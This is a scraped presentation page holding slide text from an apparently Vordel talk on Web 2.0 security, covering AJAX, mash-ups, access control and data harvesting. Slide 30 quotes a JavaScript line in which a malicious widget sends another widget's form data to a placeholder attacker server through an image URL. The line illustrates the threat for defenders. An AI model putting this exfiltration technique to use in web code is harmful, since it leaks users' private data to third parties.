TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Kürzlich hochgeladen (20)

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

Web 20 Security - Vordel

  • 1. Web 2.0 and Security Richard Mooney - Product Manager - Vordel
  • 2.
  • 3.
  • 4.
  • 7.
  • 8. Underlying Technologies: On the client side: Scripting the “XHR” // Kick off the XMLhttpRequest, set the callback xmlhttp = new XMLHttpRequest(); xmlhttp.open("GET", url, true); xmlhttp.onreadystatechange = doSomethingWithResponse; xmlhttp.send(null); // do something with the data fetched from the server function doSomethingWithResponse() { var xmlResponse = xmlhttp.responseXML; var message = xmlDocument.getElementsByTagName(‘message').item(0).firstChild.data; document.getElementById(‘message').value = message; }
  • 9.
  • 10.
  • 11.
  • 12. Underlying Technologies: Windows Live Some mash-ups use server-side proxies to allow AJAX code to fetch data from multiple different domains Users can add “widgets” to the Windows Live dashboard
  • 13. Access Control: Defintiion The ability to be able to control access to a service based on identity
  • 14.
  • 15. Access Control: Data Harvesting Web 2.0 make use of Web Services on the server-side to send data asynchronously to the client. What if you forget about the client and write your own application to data-harvest all of the data off the server? Policies can be used to ensure that only authenticated users can access the back-end Web Services. Policies can also be used to protect against data harvesting
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30. Privacy: Another technique for spying in a Mash-up Described by Anton Rager and Jeremiah Gossman - The malicious widget can simply view the innerHTML of other widgets on the same page, then hive off the data to a third-party server by appending it to an IMG tag: spyImage=document.createElement(‘img’); spyImage.src=‘http://www.pirate.com/sniff.html?” + document.getElementById(‘newEmail').value
  • 31.
  • 32.
  • 33.
  • 34.